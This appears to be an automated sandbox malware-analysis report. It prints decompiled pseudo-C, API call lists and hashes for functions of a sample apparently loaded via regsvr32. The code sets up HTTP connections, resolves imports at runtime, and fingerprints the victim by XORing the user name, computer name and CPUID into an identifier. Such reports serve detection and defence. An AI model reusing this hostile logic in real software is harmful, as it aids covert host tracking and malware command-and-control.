                    			E04F97A34(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04F963FD(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E04F917AB(_t56);
					} else {
						E04F917AB( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04F979C9) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04F95867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x4f9a320; // 0xb2d5a8
						_t15 = _t59 + 0x4f9b743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}















                    0x04f97a34
                    0x04f97a34
                    0x04f97a3f
                    0x04f97a46
                    0x04f97a4e
                    0x04f97a58
                    0x04f97a5e
                    0x04f97a69
                    0x04f97a71
                    0x04f97a81
                    0x04f97a73
                    0x04f97a76
                    0x04f97a7b
                    0x04f97a7b
                    0x04f97a71
                    0x04f97a91
                    0x04f97a99
                    0x04f97a9c
                    0x04f97b85
                    0x00000000
                    0x04f97ab7
                    0x04f97aba
                    0x04f97acd
                    0x04f97ad5
                    0x04f97ad8
                    0x04f97b00
                    0x04f97b13
                    0x04f97b1d
                    0x04f97b20
                    0x04f97b28
                    0x04f97b2b
                    0x00000000
                    0x00000000
                    0x04f97b2f
                    0x04f97b3b
                    0x04f97b4c
                    0x04f97b4e
                    0x04f97b5f
                    0x04f97b5f
                    0x04f97b6f
                    0x00000000
                    0x04f97b81
                    0x00000000
                    0x04f97b81
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f97ad8

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04F97A46
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04F97A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04F97A91
                    • InternetSetStatusCallback.WININET(00000000,04F979C9), ref: 04F97AA8
                    • ResetEvent.KERNEL32(?), ref: 04F97ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04F97ACD
                    • GetLastError.KERNEL32 ref: 04F97ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04F97B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04F97B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04F97B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04F97B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04F97B7B
                    • GetLastError.KERNEL32 ref: 04F97B85
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: 1e46c96277698eb931decf71c40454e46ff7a84b9f8b255e66bfc972bf8ac3cd
                    • Instruction ID: 43a76dfc9391d947ae1add32ec3fb5ff9389543e242d74a5da22fd4659ca23a5
                    • Opcode Fuzzy Hash: 1e46c96277698eb931decf71c40454e46ff7a84b9f8b255e66bfc972bf8ac3cd
                    • Instruction Fuzzy Hash: 4A413C71900248FBEB21AF65EC48EABBBFDEF85704F104929F512D11A0EB75AD45CB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F97E75 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4f97e75-4f97eda 190 4f97efb-4f97f25 189->190 191 4f97edc-4f97ef6 RaiseException 189->191 193 4f97f2a-4f97f36 190->193 194 4f97f27 190->194 192 4f980ab-4f980af 191->192 195 4f97f49-4f97f4b 193->195 196 4f97f38-4f97f43 193->196 194->193 197 4f97f51-4f97f58 195->197 198 4f97ff3-4f97ffd 195->198 196->195 208 4f9808e-4f98095 196->208 202 4f97f68-4f97f75 LoadLibraryA 197->202 203 4f97f5a-4f97f66 197->203 200 4f98009-4f9800b 198->200 201 4f97fff-4f98007 198->201 204 4f98089-4f9808c 200->204 205 4f9800d-4f98010 200->205 201->200 206 4f97fb8-4f97fc4 InterlockedExchange 202->206 207 4f97f77-4f97f87 GetLastError 202->207 203->202 203->206 204->208 213 4f9803e-4f9804c GetProcAddress 205->213 214 4f98012-4f98015 205->214 217 4f97fec-4f97fed FreeLibrary 206->217 218 4f97fc6-4f97fca 206->218 215 4f97f89-4f97f95 207->215 216 4f97f97-4f97fb3 RaiseException 207->216 211 4f980a9 208->211 212 4f98097-4f980a4 208->212 211->192 212->211 213->204 220 4f9804e-4f9805e GetLastError 213->220 214->213 219 4f98017-4f98022 214->219 215->206 215->216 216->192 217->198 218->198 221 4f97fcc-4f97fd8 LocalAlloc 218->221 219->213 222 4f98024-4f9802a 219->222 224 4f9806a-4f9806c 220->224 225 4f98060-4f98068 220->225 221->198 226 4f97fda-4f97fea 221->226 222->213 227 4f9802c-4f9802f 222->227 224->204 228 4f9806e-4f98086 RaiseException 224->228 225->224 226->198 227->213 229 4f98031-4f9803c 227->229 228->204 229->204 229->213
                    C-Code - Quality: 51%
                    			E04F97E75(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4f90000;
				_t115 = _t139[3] + 0x4f90000;
				_t131 = _t139[4] + 0x4f90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4f90000;
				_v16 = _t139[5] + 0x4f90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4f90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4f9a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4f9a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4f9a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4f9a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4f9a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4f9a1b8; // 0x0
										 *_t102 = _t125;
										 *0x4f9a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4f9a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                    0x04f97e84
                    0x04f97e9a
                    0x04f97ea0
                    0x04f97ea2
                    0x04f97ea7
                    0x04f97ead
                    0x04f97eb2
                    0x04f97eb5
                    0x04f97ec3
                    0x04f97eca
                    0x04f97ecd
                    0x04f97ed0
                    0x04f97ed1
                    0x04f97ed4
                    0x04f97ed7
                    0x04f97eda
                    0x04f97edf
                    0x04f97eee
                    0x00000000
                    0x04f97ef4
                    0x04f97efe
                    0x04f97f08
                    0x04f97f0d
                    0x04f97f0f
                    0x04f97f19
                    0x04f97f1c
                    0x04f97f1f
                    0x04f97f25
                    0x04f97f27
                    0x04f97f27
                    0x04f97f2a
                    0x04f97f2d
                    0x04f97f32
                    0x04f97f36
                    0x04f97f49
                    0x04f97f4b
                    0x04f97ff3
                    0x04f97ff3
                    0x04f97ffa
                    0x04f97ffd
                    0x04f98007
                    0x04f98007
                    0x04f9800b
                    0x04f98089
                    0x04f9808c
                    0x04f9808e
                    0x04f9808e
                    0x04f98095
                    0x04f98097
                    0x04f980a1
                    0x04f980a4
                    0x04f980a7
                    0x04f980a7
                    0x00000000
                    0x04f9800d
                    0x04f98010
                    0x04f9803e
                    0x04f98048
                    0x04f9804c
                    0x04f98054
                    0x04f98057
                    0x04f9805e
                    0x04f98068
                    0x04f98068
                    0x04f9806c
                    0x04f98071
                    0x04f98080
                    0x04f98086
                    0x04f98086
                    0x04f9806c
                    0x00000000
                    0x04f98017
                    0x04f9801a
                    0x04f98022
                    0x04f98037
                    0x04f9803c
                    0x00000000
                    0x00000000
                    0x04f9803c
                    0x00000000
                    0x04f98022
                    0x04f98010
                    0x04f9800b
                    0x04f97f51
                    0x04f97f58
                    0x04f97f68
                    0x04f97f6b
                    0x04f97f71
                    0x04f97f75
                    0x04f97fb8
                    0x04f97fc4
                    0x04f97fed
                    0x04f97fc6
                    0x04f97fca
                    0x04f97fd0
                    0x04f97fd8
                    0x04f97fda
                    0x04f97fdd
                    0x04f97fe3
                    0x04f97fe5
                    0x04f97fe5
                    0x04f97fd8
                    0x04f97fca
                    0x00000000
                    0x04f97fc4
                    0x04f97f7d
                    0x04f97f80
                    0x04f97f87
                    0x04f97f97
                    0x04f97f9a
                    0x04f97faa
                    0x00000000
                    0x04f97fb0
                    0x04f97f91
                    0x04f97f95
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f97f95
                    0x04f97f62
                    0x04f97f66
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f97f66
                    0x04f97f3f
                    0x04f97f43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F97EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04F97F6B
                    • GetLastError.KERNEL32 ref: 04F97F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04F97FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 62c169d8d04a74dbe6f9e84613306552a08018ad2b7692a816bb7c80a656e8fb
                    • Instruction ID: e6645c81cd5d7c5c74af889924e56e6d19fb362976e63a5ef37ac944184c7ab1
                    • Opcode Fuzzy Hash: 62c169d8d04a74dbe6f9e84613306552a08018ad2b7692a816bb7c80a656e8fb
                    • Instruction Fuzzy Hash: 56813871A10209AFEF10DFA9D884AADB7F5FB48340F148029E915E7350EBB4ED46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F921BC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 4f921bc-4f921d0 232 4f921da-4f921ec call 4f95894 231->232 233 4f921d2-4f921d7 231->233 236 4f921ee-4f921fe GetUserNameW 232->236 237 4f92240-4f9224d 232->237 233->232 238 4f9224f-4f92266 GetComputerNameW 236->238 239 4f92200-4f92210 RtlAllocateHeap 236->239 237->238 240 4f92268-4f92279 RtlAllocateHeap 238->240 241 4f922a4-4f922c6 238->241 239->238 242 4f92212-4f9221f GetUserNameW 239->242 240->241 243 4f9227b-4f92284 GetComputerNameW 240->243 244 4f9222f-4f9223e 242->244 245 4f92221-4f9222d call 4f952a9 242->245 246 4f92295-4f92298 243->246 247 4f92286-4f92292 call 4f952a9 243->247 244->238 245->244 246->241 247->246
                    C-Code - Quality: 96%
                    			E04F921BC(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4f9a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04F95894( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4f9a31c ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4f9a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E04F952A9(_v8 + _v8, _t63);
							}
							HeapFree( *0x4f9a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4f9a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E04F952A9(_v8 + _v8, _t63);
						}
						HeapFree( *0x4f9a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                    0x04f921bc
                    0x04f921c4
                    0x04f921ca
                    0x04f921cd
                    0x04f921d0
                    0x04f921d2
                    0x04f921d7
                    0x04f921d7
                    0x04f921dd
                    0x04f921df
                    0x04f921ec
                    0x04f9224d
                    0x04f921ee
                    0x04f921f3
                    0x04f921f9
                    0x04f921fe
                    0x04f9220c
                    0x04f92210
                    0x04f9221f
                    0x04f92226
                    0x04f9222d
                    0x04f9222d
                    0x04f92238
                    0x04f92238
                    0x04f92210
                    0x04f921fe
                    0x04f9224f
                    0x04f92255
                    0x04f9225f
                    0x04f92261
                    0x04f92266
                    0x04f92275
                    0x04f92279
                    0x04f92284
                    0x04f9228b
                    0x04f92292
                    0x04f92292
                    0x04f9229e
                    0x04f9229e
                    0x04f92279
                    0x04f922a7
                    0x04f922a9
                    0x04f922ac
                    0x04f922ae
                    0x04f922b1
                    0x04f922b4
                    0x04f922be
                    0x04f922c2
                    0x04f922c6

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F921F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F9220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F92217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F92238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F9225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F92273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F92280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F9229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 072fe40940b9a647fbdef66144fb42fff8f6c7639644e518570ff4c93fa379bf
                    • Instruction ID: 7155e308eb6439b7740991d4e038e91195331ffd21cdf072f199beab46c81125
                    • Opcode Fuzzy Hash: 072fe40940b9a647fbdef66144fb42fff8f6c7639644e518570ff4c93fa379bf
                    • Instruction Fuzzy Hash: 7D313C72A00209FFEB15DFA9EC81A6EB7F9EF88300F114869E505D3260EB34ED459B10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9414A Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E04F9414A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04F98184();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4f9a320; // 0xb2d5a8
				_t5 = _t13 + 0x4f9b87e; // 0x5ac8e26
				_t6 = _t13 + 0x4f9b59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04F97DEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4f9a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                    0x04f9414a
                    0x04f94152
                    0x04f94156
                    0x04f9415c
                    0x04f94161
                    0x04f94166
                    0x04f94169
                    0x04f9416c
                    0x04f94171
                    0x04f94172
                    0x04f94175
                    0x04f9417a
                    0x04f94181
                    0x04f9418b
                    0x04f9418d
                    0x04f9418e
                    0x04f94191
                    0x04f941ad
                    0x04f941b3
                    0x04f941b7
                    0x04f94205
                    0x04f941b9
                    0x04f941c6
                    0x04f941d6
                    0x04f941de
                    0x04f941f0
                    0x04f941f4
                    0x00000000
                    0x00000000
                    0x04f941e0
                    0x04f941e3
                    0x04f941e8
                    0x04f941ea
                    0x04f941ea
                    0x04f941c8
                    0x04f941ca
                    0x04f941f6
                    0x04f941f7
                    0x04f941f7
                    0x04f941c6
                    0x04f9420c

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?,?), ref: 04F94156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04F9416C
                    • _snwprintf.NTDLL ref: 04F94191
                    • CreateFileMappingW.KERNELBASE(000000FF,04F9A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04F941AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?), ref: 04F941BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04F941D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53), ref: 04F941F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?), ref: 04F941FF
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 274e3f025263cd0af635b38421630f9a0217cae98c87f3f6837b2446cb3af028
                    • Instruction ID: e64720cf541718e74a5599253fe1c35240b79023c194348fca197400816cb260
                    • Opcode Fuzzy Hash: 274e3f025263cd0af635b38421630f9a0217cae98c87f3f6837b2446cb3af028
                    • Instruction Fuzzy Hash: AB21A8B2A00218BBEB12AB64DC05F9E37E9EB94754F150125F615E72D0DBB0ED47CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95622 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04F95622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04F95867(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04F917AB(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04F917AB(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04F917AB(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04F917AB(_t46);
				}
				return _t24;
			}












                    0x04f95622
                    0x04f95622
                    0x04f95624
                    0x04f95626
                    0x04f9562d
                    0x04f95634
                    0x04f95634
                    0x04f95639
                    0x04f9563e
                    0x04f95645
                    0x04f9564c
                    0x04f95650
                    0x04f95655
                    0x04f95655
                    0x04f95657
                    0x04f9565c
                    0x04f95660
                    0x04f95665
                    0x04f95665
                    0x04f95667
                    0x04f9566c
                    0x04f95670
                    0x04f95675
                    0x04f95675
                    0x04f95677
                    0x04f95682
                    0x04f95685
                    0x04f95685
                    0x04f95687
                    0x04f9568c
                    0x04f9568f
                    0x04f9568f
                    0x04f95691
                    0x04f95698
                    0x04f9569b
                    0x04f956a0
                    0x04f956a3
                    0x04f956a3
                    0x04f956a6
                    0x04f956ab
                    0x04f956ae
                    0x04f956ae
                    0x04f956b3
                    0x04f956b7
                    0x04f956ba
                    0x04f956ba
                    0x04f956bf
                    0x04f956c4
                    0x00000000
                    0x04f956c7
                    0x04f956ce

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95650
                    • InternetCloseHandle.WININET(?), ref: 04F95655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95660
                    • InternetCloseHandle.WININET(?), ref: 04F95665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95670
                    • InternetCloseHandle.WININET(?), ref: 04F95675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04F91B44,?,?,00000000,00000000,74E481D0), ref: 04F95685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04F91B44,?,?,00000000,00000000,74E481D0), ref: 04F9568F
                      • Part of subcall function 04F95867: WaitForMultipleObjects.KERNEL32(00000002,04F97AF8,00000000,04F97AF8,?,?,?,04F97AF8,0000EA60), ref: 04F95882
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
